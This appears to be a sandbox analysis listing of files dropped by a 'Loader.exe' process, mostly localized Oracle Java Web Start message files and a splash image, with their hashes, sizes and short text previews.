                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.919780187496773
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:WvaqyL1nlrDtzh5+VN9JrnjXyv6jq/YgKe1h/KZkCUdr5pAvA1t2CPTOsdIamy:txrj5Snk6+wuir25pAvAv2ITOsd9
                                                                                                                                                                                                                                                                                                              MD5:FF9CFEE1ACFCD927253A6E35673F1BB7
                                                                                                                                                                                                                                                                                                              SHA1:957E6609A1AF6D06A45A6F7B278BE7625807B909
                                                                                                                                                                                                                                                                                                              SHA-256:E130FBD5FA378A380F46F42981F2C97BC152059C27120204AB4DA47079D31513
                                                                                                                                                                                                                                                                                                              SHA-512:F42601092436D7AF30CCD81126185232D9D643B195D3D4619AEC451E3E2A60E33E6378E770DD1A4CDF7AB20CB749371665A992CA73D2842A7102F3FB34B6B9EB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=interner Fehler, unbekannte Meldung..error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden..error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten..error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten..error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich..error.accept.failed=Startbildschirm: accept nicht erfolgreich..error.recv.failed=Startbildschirm: recv nicht erfolgreich..error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich..error.read=\u00DCber Pufferende hinaus gelesen..error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden..error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n..# "Last WinSock Error" mean

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_es.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1475), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3632
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.776451902180833
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:KHelXJn5woLUosi30hrleaRSfvlBY0CQ1Z:KHelNTAxFtlE/71Z
                                                                                                                                                                                                                                                                                                              MD5:72BDAE07C5D619E5849A97ACC6A1090F
                                                                                                                                                                                                                                                                                                              SHA1:9FC8A7A29658AC23A30AB9D655117BB79D08DC3B
                                                                                                                                                                                                                                                                                                              SHA-256:821A3452ECB9F29BCEC16C0B39FB668C2CC30C7F7283B34BFC5400040723892B
                                                                                                                                                                                                                                                                                                              SHA-512:67F0D1D60012B5598864B68612AA488AF1B5876FF5F347CD98ABCF1E3C0D267CF0354D5085BF12B0A09C6EF124FD0117CD16FCC032DA2B195D45BAB19740BB78
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=Error interno, mensaje desconocido..error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n..error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv)..error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) ..error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket..error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept..error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv..error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido..error.read=Lectura m\u00E1s all\u00E1 del final del buffer..error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido..error.splash.exit=Saliendo del proceso d

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_fr.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1575), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3441
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.832330268062187
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:KE2CXpRLJDNXQC6tNaEGBlu9hUv5//zEvDiwkISAyHgKe1p6KF/uoYuh1LNRtS0f:KERXlp6tN1VHq1Kt1S4x8Xi
                                                                                                                                                                                                                                                                                                              MD5:FFE3CC16616314296C3262B0A0E093CD
                                                                                                                                                                                                                                                                                                              SHA1:198DD1C6E6707C10AE74A1C42E8A91C429598F3B
                                                                                                                                                                                                                                                                                                              SHA-256:3941736BEF6A8E53D002B6B67ECE4793C2F3F34BCC1ECB271684EB3F73FC4103
                                                                                                                                                                                                                                                                                                              SHA-512:CD3A9329F405CA14E11CDBB74D467B31A31530CBF00537B16FB23AEBC6C07EB268E9624FDBC997AA0CF4852DAC288E1D011E2FC392D71E25DBDF52E359BA9D4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erreur interne, message inconnu..error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration..error.launch.execv=Erreur lors de l'appel de Java Web Start (execv)..error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) ..error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket..error.accept.failed=Accueil : \u00E9chec d'accept..error.recv.failed=Accueil : \u00E9chec de recv..error.invalid.port=Accueil : impossible de r\u00E9activer un port valide..error.read=Lecture apr\u00E8s la fin de tampon..error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton..error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n..# "Last WinSock Error" means the error message for the last operation that

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_it.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1392), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3255
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.7050139579578145
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:KTi+qOaVUVVMsD/B0FN5+eADELDHxhdpHgKe1uo265eLaqMQ6URhmwgFs+ur60:KJBa2VtzeDLDRhd5A26+7RhZgR0
                                                                                                                                                                                                                                                                                                              MD5:BF5E5310B2DCF8E8B3697B358AD4446D
                                                                                                                                                                                                                                                                                                              SHA1:C746AC1F46F607FA8F971BEA2B6853746A4FB28D
                                                                                                                                                                                                                                                                                                              SHA-256:CC9AD73957535011EE2376C23DE2C2597F877ACEBA9173E822EE79AAD3C4E9E6
                                                                                                                                                                                                                                                                                                              SHA-512:B6C61D38B0ACC427B9B2F4C19DABD7EACBE8EEA6B973FD31B3555C4C5B3FFAF1CA036B730359346F57223B44CCE79E04A6D06BBC13C6F7DD26ED463776BB6DCC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=errore interno, messaggio sconosciuto..error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione..error.launch.execv=Errore durante la chiamata di Java Web Start (execv)..error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) ..error.listener.failed=Apertura: sysCreateListenerSocket non riuscito..error.accept.failed=Apertura: accept non riuscito..error.recv.failed=Apertura: recv non riuscito..error.invalid.port=Apertura: impossibile identificare una porta valida..error.read=Tentativo di lettura dopo la fine del buffer..error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato..error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n..# "Last WinSock Error" means the error message for the last oper

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_ja.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2924), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6381
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5983590678211135
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:Mu7cepcgD8do+O2D+k8/RJFGQcHGqo72hzEflA44CAmIbIC3j5pN/o8woJe:PctgYqhTYzG2O
                                                                                                                                                                                                                                                                                                              MD5:D830FC76BDD1975010ECE4C5369DADF8
                                                                                                                                                                                                                                                                                                              SHA1:D8CC3F54325142EFA740026E2BC623AFE6F3ACB5
                                                                                                                                                                                                                                                                                                              SHA-256:11E886336BA51A9044AB1A87C60CEEE34C29BB724E06A16968D31531A7001064
                                                                                                                                                                                                                                                                                                              SHA-512:7B867A50A811FBD7FFDAD0B729CA4501E16386EE5C4940A4CF9A805767CC0D10F7E3BDFD6A60204D79292D778D93E3BD915368AC0E9453BBB1010ADFD9655F0F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8..error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093..error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv)..error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) ..error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.recv.fai

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_ko.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2601), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5744
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.781504394194986
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:GhymCk3kjLqgz9RkfrsEW/p9M32i0HkZr+ywc8b8+/moD7yct070DL70Dm:Dm5kLfIErMbT/44in
                                                                                                                                                                                                                                                                                                              MD5:64DE22212EE92F29BCA3ACED72737254
                                                                                                                                                                                                                                                                                                              SHA1:C4DBC247043578CCF9CD8DAB652D096703D5B26E
                                                                                                                                                                                                                                                                                                              SHA-256:292696C94D5FD0BF2FF4AF9E4D363BFCBE888D2E65BD18A20CF71081FB1C9B0D
                                                                                                                                                                                                                                                                                                              SHA-512:CA33C75B66D8B5316B1C3ED41A9A14DD8611A3BB9B26EFDC7F468250696D515CF1E966831975C9ABDC33E9A1C59167FE79BA547592D2A04997E1342433E7B628
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4...error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4...error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4...error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. ..error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.r

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_pt_BR.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1319), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3317
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.869662880084367
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:3c6BeKTDcUsLYg9tStwmx+supWBxKy0HgKe1u6K0NCMc6MTNTjtA7NZdlw7ZHAW:3c6fbEf1mxPuUBxKy4va+mZdlw7Z7
                                                                                                                                                                                                                                                                                                              MD5:4078691AB22C4F0664856BE0C024A52F
                                                                                                                                                                                                                                                                                                              SHA1:6247FC05DE429F65DC4E1356C4715DC51F43B98F
                                                                                                                                                                                                                                                                                                              SHA-256:6869B27B12B99C9D169B3E018284BE0F7631DBDF2DDD5F4EA5B1A458736FDFDF
                                                                                                                                                                                                                                                                                                              SHA-512:BB02765F69E23C732C790EB994800C83BB8EFE7FF8CE0BCDC475EC5A29CEF5A33A5513AB1A7DC9F0F066B807A0980C41EC0037710873A32BD2952DBED79D24CA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erro interno, mensagem desconhecida..error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o..error.launch.execv=Erro encontrado ao chamar Java Web Start (execv)..error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) ..error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket..error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept..error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv..error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida..error.read=Ler ap\u00F3s o final do buffer..error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado..error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n..# "Last WinSock Error" means the error message

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_sv.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1386), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3441
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.927824210480987
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:KYD1QNsQZ/lmo8ZuLgdBGpv3JRJ/7coh91XlK7Q/vm2QAfO:9D1+sCmapce1KGm2QIO
                                                                                                                                                                                                                                                                                                              MD5:81BBDEA4DC9803A6EB78CE7D5CA018ED
                                                                                                                                                                                                                                                                                                              SHA1:9AAF012276AD89CE7273CF5F0BE4C95B72D906AB
                                                                                                                                                                                                                                                                                                              SHA-256:565B8FF1F31784378884D9D7468FFDFDDA5B001ACB5BB393A5006AC19BE4E67A
                                                                                                                                                                                                                                                                                                              SHA-512:310017DD27C91C492188737494DA04CAB241D0BF4E91326AFB4A3F98CBFF78A6C0BBC14EC7E883597E9D506FAA80BA4E9A25B5F46BFD2543850323061E829A84
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internt fel, ok\u00E4nt meddelande..error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen..error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv)..error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) ..error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte..error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras..error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga..error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port..error.read=L\u00E4ste f\u00F6rbi slutet av bufferten..error.xmlparsing=XML-tolkningsfel: fel typ av igenk\u00E4nningstecken hittades..error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n..# "Last

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_zh_CN.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1857), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4104
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.04197285715923
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:Me7R8zl0Zf4z3X4Gv2hEpeStEKADydYL1WfK0eSm91j7:1R8pOfWHJvOJT1WPtK1j7
                                                                                                                                                                                                                                                                                                              MD5:823D1F655440C3912DD1F965A23363FC
                                                                                                                                                                                                                                                                                                              SHA1:50B941A38B9C5F565F893E1E0824F7619F51185C
                                                                                                                                                                                                                                                                                                              SHA-256:86663DED105B77261C0556468A93BC8666A094B918299A61AF0A8E30F42019C7
                                                                                                                                                                                                                                                                                                              SHA-512:1EBF989D2121CF05FFC912B9B228C4D4523763EB1A689EC74568D811C88DCF11032FFC8007BB24DAF7D079B580662B77D94B4B8D71A2E891EF27979FF32CD727
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F..error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF..error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF..error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25..error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25..error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25..error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3..error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E..error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B..error.s

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_zh_HK.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3784
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.17620120701776
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                                                                                                                                                                                                                                                                                              MD5:4287D97616F708E0A258BE0141504BEB
                                                                                                                                                                                                                                                                                                              SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                                                                                                                                                                                                                                                                                              SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                                                                                                                                                                                                                                                                                              SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_zh_TW.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3784
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.17620120701776
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                                                                                                                                                                                                                                                                                              MD5:4287D97616F708E0A258BE0141504BEB
                                                                                                                                                                                                                                                                                                              SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                                                                                                                                                                                                                                                                                              SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                                                                                                                                                                                                                                                                                              SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\splash.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8590
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.910688771816331
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                                                                                                                                                                                                                                                                                              MD5:249053609EAF5B17DDD42149FC24C469
                                                                                                                                                                                                                                                                                                              SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                                                                                                                                                                                                                                                                                              SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                                                                                                                                                                                                                                                                                              SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                                                                                                                                                                                                                                                                                              Malicious:false
